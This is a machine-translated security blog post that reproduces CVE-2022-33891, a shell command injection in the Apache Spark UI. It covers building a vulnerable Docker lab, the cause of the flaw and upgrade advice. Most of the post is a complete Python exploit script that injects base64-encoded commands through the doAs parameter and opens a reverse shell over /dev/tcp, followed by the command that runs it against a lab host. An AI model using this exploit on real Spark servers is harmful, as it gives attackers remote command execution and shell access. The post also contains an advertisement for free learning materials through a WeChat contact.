当前位置:网站首页>Cve-2022-33891 Apache spark shell command injection vulnerability recurrence
Cve-2022-33891 Apache spark shell command injection vulnerability recurrence
2022-07-26 14:59:00 【Hetian network security laboratory】
brief introduction
Spark Is a unified analysis engine for large-scale data processing . It provides Scala、Java、Python and R Advanced in API, And an optimization engine that supports general calculation diagrams for data analysis . It also supports a rich set of advanced tools , Include for SQL and DataFrames Of Spark SQL、 be used for Pandas Workload Spark Upper Pandas API、 For machine learning MLlib、 For graphics processing GraphX And structured streams for stream processing .
Affects version
Apache spark version<3.0.3
3.1.1<Apache spark version<3.1.2
Apache Spark version>= 3.3.0
Environment building
At present, the old version cannot be found on the official website docker The mirror

The search for the old version is also empty
The environment here is built with github Image of private warehouse on , Download address
https://github.com/big-data-europe/docker-spark
https://github.com/big-data-europe/docker-spark
The configuration file needs to be modified , Download the vulnerable version , modify dockerfile,V3.1.1

Revised version
docker-compose up -d

visit
http:10.10.10.32:8080

【---- Help network security learn , All the following learning materials are free ! Add weix:yj009991, remarks “ csdn ” obtain !】
① Thinking map of the growth path of Network Security Learning
② 60+ Network security classic common toolkit
③ 100+SRC Vulnerability analysis report
④ 150+ Network security attack and defense technology ebook
⑤ The most authoritative CISSP Certification test guide + Question bank
⑥ super 1800 page CTF Practical skills manual
⑦ A collection of the latest interview questions from Wangan factory ( With answers )
⑧ APP Client security detection guide ( Android +IOS)
There are no loopholes in the test here , The configuration file needs to be modified
echo "spark.acls.enable true" >> conf/spark-defaults.conf
POC as follows :
#!/usr/bin/env python3
import requests
import argparse
import base64
import datetime
parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
args = parser.parse_args()
full_url = f"{args.url}:{args.port}"
def check_for_vuln(url):
print("[*] Attempting to connect to site...")
r = requests.get(f"{full_url}/?doAs='testing'", allow_redirects=False)
if r.status_code != 403:
print("[-] Does not look like an Apache Spark server.")
quit(1)
elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
print("[-] Does not look like an Apache Spark server.")
quit(1)
else:
print("[*] Performing sleep test of 10 seconds...")
t1 = datetime.datetime.now()
run_cmd("sleep 10")
t2 = datetime.datetime.now()
delta = t2-t1
if delta.seconds < 10:
print("[-] Sleep was less than 10. This target is probably not vulnerable")
else:
print("[+] Sleep was 10 seconds! This target is probably vulnerable!")
exit(0)
def cmd_prompt():
# Provide user with cmd prompt on loop to run commands
cmd = input("> ")
return cmd
def base64_encode(cmd):
message_bytes = cmd.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_cmd = base64_bytes.decode('ascii')
return base64_cmd
def run_cmd(cmd):
try:
# Execute given command from cmd prompt
#print("[*] Command is: " + cmd)
base64_cmd = base64_encode(cmd)
#print("[*] Base64 command is: " + base64_cmd)
exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
exploit_req = f"{full_url}{exploit}"
print("[*] Full exploit request is: " + exploit_req)
requests.get(exploit_req, allow_redirects=False)
except Exception as e:
print(str(e))
def revshell(lhost, lport):
print(f"[*] Reverse shell mode.\n[*] Set up your listener by entering the following:\n nc -nvlp {lport}")
input("[!] When your listener is set up, press enter!")
rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
run_cmd(rev_shell_cmd)
def main():
if args.check and args.revshell:
print("[!] Please choose either revshell or check!")
exit(1)
elif args.check:
check_for_vuln(full_url)
# Revshell
elif args.revshell:
if not (args.listeninghost and args.listeningport):
print("[x] You need a listeninghost and listening port!")
exit(1)
else:
lhost = args.listeninghost
lport = args.listeningport
revshell(lhost, lport)
else:
# "Interactive" mode
print("[*] \"Interactive\" mode!\n[!] Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
while True:
command_to_run = cmd_prompt()
run_cmd(command_to_run)
if __name__ == "__main__":
main()If it fails, rebuild the project , Use the following file to start docker It may be the problem of mirroring , In different warehouses Apache spark Different configurations , This version is V3.0.0 Of
version: '2'
services:
spark:
image: docker.io/bitnami/spark:3.0.0
environment:
- SPARK_MODE=master
- SPARK_RPC_AUTHENTICATION_ENABLED=no
- SPARK_RPC_ENCRYPTION_ENABLED=no
- SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
- SPARK_SSL_ENABLED=no
ports:
- '8080:8080'
visit

Modify the configuration file
docker exec -it 8a /bin/bash
I have no [email protected]:/opt/bitnami/spark$ echo "spark.acls.enable true" >> conf/spark-defaults.conf
I have no [email protected]:/opt/bitnami/spark$ cat conf/spark-defaults.conf

Configuration has been appended , restart docker
[email protected]:/home/ubuntu/Desktop/spark# docker-compose up -d

Use poc To generate payload, Or manually , But the command to be executed should use echo Write execute and do base64 Decoding takes effect after encoding .

But I can't see the echo , Direct rebound shell
python 2.py -u http://192.168.0.112 -p 8080 --revshell -lh 192.168.0.121 -lp 4444Check the connection status

Causes of loopholes
The vulnerability is caused by Apache Spark UI Provides configuration options spark.acls.enable Enable ACL The possibility of . Use authentication filters , This will check whether the user has access to view or modify the application . If enabled ACL, be HttpSecurityFilter The code path in allows someone to perform impersonation by providing any user name . then , Malicious users may be able to access the permission check function , This function will eventually build a Unix shell Command and execute , Lead to arbitrary shell Command execution .
Reference resources :Security | Apache Sparkhttps://spark.apache.org/security.html
Repair suggestions
1. It is recommended to upgrade to a safe version , Refer to the official website link :
Downloads | Apache Sparkhttps://spark.apache.org/downloads.html
2. Add blacklist or add WAF The rules ( A temporary plan ).
More range experiments 、 Network security learning materials , Please click here >>
https://www.hetianlab.com
边栏推荐
- OSS deletes all files two days before the current time
- 【华为联机对战服务】客户端退出重连或中途进入游戏,新玩家如何补帧?
- 一个满的10L容器,7L、4L空的容器,如何得到5L的水
- C nanui related function integration
- SSH that must be read on cloud native
- 7. In JS [] = =! [] Why is it true?
- SiamFC:用于目标跟踪的全卷积孪生网络
- Is the MySQL index tree built before each search or when the index is built?
- Lean product development: principles, methods and Implementation
- 双屏协作效率翻倍 灵耀X双屏Pro引领双屏科技新潮流
猜你喜欢

基于物联网的环境调节系统(ESP32-C3+Onenet+微信小程序)

中值滤波器

C# Winfrom 常用功能整合

31. Opinion based relational pivoting forcross domain aspect term extraction reading notes

14. Bridge-Based Active Domain Adaptation for Aspect Term Extraction 阅读笔记

双屏协作效率翻倍 灵耀X双屏Pro引领双屏科技新潮流

【方差分析】之matlab求解

Embedded development: skills of debugging embedded software

华为应用已经调用了checkAppUpdate接口,为什么应用内不提示版本更新

1. Sum of two numbers
随机推荐
Advanced MySQL v. InnoDB data storage structure
SP export map to Maya
MySQL builds master-slave replication
领导抢功劳,我改个变量名让他下岗了
【整数规划】
go开发调试之Delve的使用
双屏协作效率翻倍 灵耀X双屏Pro引领双屏科技新潮流
OSPF和MGRE实验
31. Opinion-based Relational Pivoting forCross-domain Aspect Term Extraction 阅读笔记
笔记(5)
JMeter distributed
14. Bridge-Based Active Domain Adaptation for Aspect Term Extraction 阅读笔记
《MySQL高级篇》五、InnoDB数据存储结构
Matlab solution of [analysis of variance]
Siamfc: full convolution twin network for target tracking
[integer programming]
SA-Siam:用于实时目标跟踪的孪生网络
C # use shift > > and operation and & to judge whether the two binary numbers have changed
自编码器 AE(AutoEncoder)程序
WPF 常用功能整合